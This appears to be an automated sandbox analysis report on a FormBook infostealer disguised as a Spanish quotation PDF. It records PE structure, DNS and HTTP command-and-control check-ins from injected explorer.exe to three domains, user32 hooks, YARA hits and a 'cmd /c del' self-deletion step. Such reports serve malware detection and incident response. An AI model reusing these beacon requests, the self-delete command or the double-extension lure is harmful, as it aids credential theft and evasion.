Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6c900 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x47ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6a954 | 0x6aa00 | False | 0.877765973036 | data | 7.76378455521 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x6e000 | 0x47ac | 0x4800 | False | 0.258192274306 | data | 4.85061345991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x74000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x6e130 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
RT_GROUP_ICON | 0x72358 | 0x14 | data | |
RT_VERSION | 0x7236c | 0x254 | data | |
RT_MANIFEST | 0x725c0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                Imports

DLL | Import
mscoree.dll | _CorExeMain

                Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright |
Assembly Version | 0.0.0.0
InternalName | OSVERSIONIN.exe
FileVersion | 0.0.0.0
ProductVersion | 0.0.0.0
FileDescription |
OriginalFilename | OSVERSIONIN.exe

                Network Behavior

                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/02/21-18:39:50.928609 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49833 | 156.234.12.248 | 192.168.2.3
12/02/21-18:40:11.587934 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49872 | 80 | 192.168.2.3 | 192.0.78.24
12/02/21-18:40:11.587934 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49872 | 80 | 192.168.2.3 | 192.0.78.24
12/02/21-18:40:11.587934 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49872 | 80 | 192.168.2.3 | 192.0.78.24

                Network Port Distribution

                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 18:39:27.587543964 CET | 49785 | 80 | 192.168.2.3 | 162.214.233.244
Dec 2, 2021 18:39:27.748866081 CET | 80 | 49785 | 162.214.233.244 | 192.168.2.3
Dec 2, 2021 18:39:27.749020100 CET | 49785 | 80 | 192.168.2.3 | 162.214.233.244
Dec 2, 2021 18:39:27.749593019 CET | 49785 | 80 | 192.168.2.3 | 162.214.233.244
Dec 2, 2021 18:39:27.910638094 CET | 80 | 49785 | 162.214.233.244 | 192.168.2.3
Dec 2, 2021 18:39:27.910689116 CET | 80 | 49785 | 162.214.233.244 | 192.168.2.3
Dec 2, 2021 18:39:27.910717010 CET | 80 | 49785 | 162.214.233.244 | 192.168.2.3
Dec 2, 2021 18:39:27.910948992 CET | 49785 | 80 | 192.168.2.3 | 162.214.233.244
Dec 2, 2021 18:39:27.911222935 CET | 49785 | 80 | 192.168.2.3 | 162.214.233.244
Dec 2, 2021 18:39:28.072073936 CET | 80 | 49785 | 162.214.233.244 | 192.168.2.3
Dec 2, 2021 18:39:50.447215080 CET | 49833 | 80 | 192.168.2.3 | 156.234.12.248
Dec 2, 2021 18:39:50.687839031 CET | 80 | 49833 | 156.234.12.248 | 192.168.2.3
Dec 2, 2021 18:39:50.687947035 CET | 49833 | 80 | 192.168.2.3 | 156.234.12.248
Dec 2, 2021 18:39:50.688074112 CET | 49833 | 80 | 192.168.2.3 | 156.234.12.248
Dec 2, 2021 18:39:50.928482056 CET | 80 | 49833 | 156.234.12.248 | 192.168.2.3
Dec 2, 2021 18:39:50.928608894 CET | 80 | 49833 | 156.234.12.248 | 192.168.2.3
Dec 2, 2021 18:39:50.928623915 CET | 80 | 49833 | 156.234.12.248 | 192.168.2.3
Dec 2, 2021 18:39:50.928740978 CET | 49833 | 80 | 192.168.2.3 | 156.234.12.248
Dec 2, 2021 18:39:50.928864956 CET | 49833 | 80 | 192.168.2.3 | 156.234.12.248
Dec 2, 2021 18:39:51.169332027 CET | 80 | 49833 | 156.234.12.248 | 192.168.2.3
Dec 2, 2021 18:40:11.571003914 CET | 49872 | 80 | 192.168.2.3 | 192.0.78.24
Dec 2, 2021 18:40:11.587675095 CET | 80 | 49872 | 192.0.78.24 | 192.168.2.3
Dec 2, 2021 18:40:11.587774992 CET | 49872 | 80 | 192.168.2.3 | 192.0.78.24
Dec 2, 2021 18:40:11.587934017 CET | 49872 | 80 | 192.168.2.3 | 192.0.78.24
Dec 2, 2021 18:40:11.604633093 CET | 80 | 49872 | 192.0.78.24 | 192.168.2.3
Dec 2, 2021 18:40:11.604665041 CET | 80 | 49872 | 192.0.78.24 | 192.168.2.3
Dec 2, 2021 18:40:11.604674101 CET | 80 | 49872 | 192.0.78.24 | 192.168.2.3
Dec 2, 2021 18:40:11.604862928 CET | 49872 | 80 | 192.168.2.3 | 192.0.78.24
Dec 2, 2021 18:40:11.604958057 CET | 49872 | 80 | 192.168.2.3 | 192.0.78.24
Dec 2, 2021 18:40:11.621573925 CET | 80 | 49872 | 192.0.78.24 | 192.168.2.3

                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 18:39:27.422539949 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
Dec 2, 2021 18:39:27.569787979 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
Dec 2, 2021 18:39:50.271529913 CET | 55102 | 53 | 192.168.2.3 | 8.8.8.8
Dec 2, 2021 18:39:50.446052074 CET | 53 | 55102 | 8.8.8.8 | 192.168.2.3
Dec 2, 2021 18:40:11.538088083 CET | 56236 | 53 | 192.168.2.3 | 8.8.8.8
Dec 2, 2021 18:40:11.569740057 CET | 53 | 56236 | 8.8.8.8 | 192.168.2.3

                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 2, 2021 18:39:27.422539949 CET | 192.168.2.3 | 8.8.8.8 | 0x8b16 | Standard query (0) | www.weqffg.site | A (IP address) | IN (0x0001)
Dec 2, 2021 18:39:50.271529913 CET | 192.168.2.3 | 8.8.8.8 | 0x96ce | Standard query (0) | www.afxwn.icu | A (IP address) | IN (0x0001)
Dec 2, 2021 18:40:11.538088083 CET | 192.168.2.3 | 8.8.8.8 | 0x50a3 | Standard query (0) | www.analytics-at-scale.com | A (IP address) | IN (0x0001)

                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 2, 2021 18:39:27.569787979 CET | 8.8.8.8 | 192.168.2.3 | 0x8b16 | No error (0) | www.weqffg.site | | 162.214.233.244 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:39:50.446052074 CET | 8.8.8.8 | 192.168.2.3 | 0x96ce | No error (0) | www.afxwn.icu | | 156.234.12.248 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:40:11.569740057 CET | 8.8.8.8 | 192.168.2.3 | 0x50a3 | No error (0) | www.analytics-at-scale.com | analytics-at-scale.com | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 18:40:11.569740057 CET | 8.8.8.8 | 192.168.2.3 | 0x50a3 | No error (0) | analytics-at-scale.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:40:11.569740057 CET | 8.8.8.8 | 192.168.2.3 | 0x50a3 | No error (0) | analytics-at-scale.com | | 192.0.78.25 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • www.weqffg.site
                • www.afxwn.icu
                • www.analytics-at-scale.com

                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49785 | 162.214.233.244 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:39:27.749593019 CET | 9660 | OUT | GET /c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz HTTP/1.1
                Host: www.weqffg.site
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
Dec 2, 2021 18:39:27.910689116 CET | 9770 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 02 Dec 2021 17:39:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49833 | 156.234.12.248 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:39:50.688074112 CET | 9884 | OUT | GET /c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz HTTP/1.1
                Host: www.afxwn.icu
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
                Dec 2, 2021 18:39:50.928608894 CET9885INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 17:39:50 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                Session ID   Source IP     Source Port   Destination IP    Destination Port   Process
                2            192.168.2.3   49872         192.0.78.24       80                 C:\Windows\explorer.exe

                Timestamp: Dec 2, 2021 18:40:11.587934017 CET
                kBytes transferred: 9976
                Direction: OUT
                Data:
                GET /c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz HTTP/1.1
                Host: www.analytics-at-scale.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:

                Timestamp: Dec 2, 2021 18:40:11.604665041 CET
                kBytes transferred: 9976
                Direction: IN
                Data:
                HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Thu, 02 Dec 2021 17:40:11 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz
                X-ac: 2.hhn _dfw
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Code Manipulations

                User Modules

                Hook Summary

                Function Name   Hook Type   Active in Processes
                PeekMessageA    INLINE      explorer.exe
                PeekMessageW    INLINE      explorer.exe
                GetMessageW     INLINE      explorer.exe
                GetMessageA     INLINE      explorer.exe

                Processes

                Process: explorer.exe, Module: user32.dll

                Function Name   Hook Type   New Data
                PeekMessageA    INLINE      0x48 0x8B 0xB8 0x82 0x2E 0xE7
                PeekMessageW    INLINE      0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                GetMessageW     INLINE      0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                GetMessageA     INLINE      0x48 0x8B 0xB8 0x82 0x2E 0xE7

                Statistics

                Behavior

                System Behavior

                General

                Start time: 18:38:06
                Start date: 02/12/2021
                Path: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
                Imagebase: 0xf20000
                File size: 456192 bytes
                MD5 hash: 985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: .Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: low

                General

                Start time: 18:38:08
                Start date: 02/12/2021
                Path: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit): false
                Commandline: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Imagebase: 0x90000
                File size: 456192 bytes
                MD5 hash: 985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: low

                General

                Start time: 18:38:09
                Start date: 02/12/2021
                Path: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit): true
                Commandline: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Imagebase: 0xd50000
                File size: 456192 bytes
                MD5 hash: 985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: low

                General

                Start time: 18:38:12
                Start date: 02/12/2021
                Path: C:\Windows\explorer.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\Explorer.EXE
                Imagebase: 0x7ff720ea0000
                File size: 3933184 bytes
                MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges: false
                Has administrator privileges: false
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: high

                General

                Start time: 18:38:39
                Start date: 02/12/2021
                Path: C:\Windows\SysWOW64\msdt.exe
                Wow64 process (32bit): true
                Commandline: C:\Windows\SysWOW64\msdt.exe
                Imagebase: 0xeb0000
                File size: 1508352 bytes
                MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                Has elevated privileges: false
                Has administrator privileges: false
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: moderate

                General

                Start time: 18:38:47
                Start date: 02/12/2021
                Path: C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit): true
                Commandline: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
                Imagebase: 0xd80000
                File size: 232960 bytes
                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges: false
                Has administrator privileges: false
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:38:48
                Start date: 02/12/2021
                Path: C:\Windows\System32\conhost.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase: 0x7ff7f20f0000
                File size: 625664 bytes
                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges: false
                Has administrator privileges: false
                Programmed in: C, C++ or other language
                Reputation: high

                Disassembly

                Code Analysis
